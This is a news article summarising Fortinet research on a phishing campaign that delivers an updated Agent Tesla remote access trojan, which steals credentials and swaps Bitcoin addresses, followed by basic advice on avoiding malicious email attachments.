A phishing campaign is delivering a new variant of one of the oldest forms remote access trojan (RAT) malware, in an effort to steal usernames, passwords and other sensitive information. It also aims to steal cryptocurrency from the victim.

Agent Tesla first emerged in 2014 and it remains a common form of malware in 2021. The malware is focused around stealing sensitive information from compromised Windows machines with the aid of a keylogger, which sends what the victim is typing to the attacker – allowing them to see usernames, passwords and more.

Now researchers at Fortinet have detailed a new Agent Tesla campaign which distributes an updated version of the malware via phishing emails.

The malicious messages are designed to look like a business email – for example, one asks the user to open a Microsoft Excel attachment titled “Order Requirements and Specs”. The document contains a macro which, if run, starts a process which executes and downloads Agent Tesla onto the machine.

SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)

This is done across a number of different stages, including downloading PowerShell files, running VBScript and creating a schedule task, all to help mask the installation of the malware, allowing the attacker to secretly monitor activity on the machine. This version of Agent Tesla pings the operator every 20 minutes, sending them any new input detected.

In addition to this, the attack also hijacks any Bitcoin wallet on the victim’s device. By monitoring activity on the machine and the abuse of PowerShell code, the attacker can monitor for a  a valid bitcoin address. If this is spotted, the code modifies the Bitcoin address and changes it to one owned by the attacker, allowing them to steal cryptocurrency transfers.

Despite being around since 2014, Agent Tesla remains popular with cyber criminals by remaining effective and being relatively cheap: it can cost as little as $15 to buy a license for on underground forums.

In addition to low cost, the authors of Agent Tesla offer 24/7 technical support, allowing it to serve as an entry point for less sophisticated cyber criminals – while still being potentially damaging to any person or organisation which falls victim to the malware.

Many of the attacks continue to be distributed by phishing emails – which means if the right precautions are taken, falling victim can be avoided. Cybersecurity researchers recommend using anti-virus software to detect suspicious activity, while users should be careful when it comes to opening attachments from unknown or unexpected emails.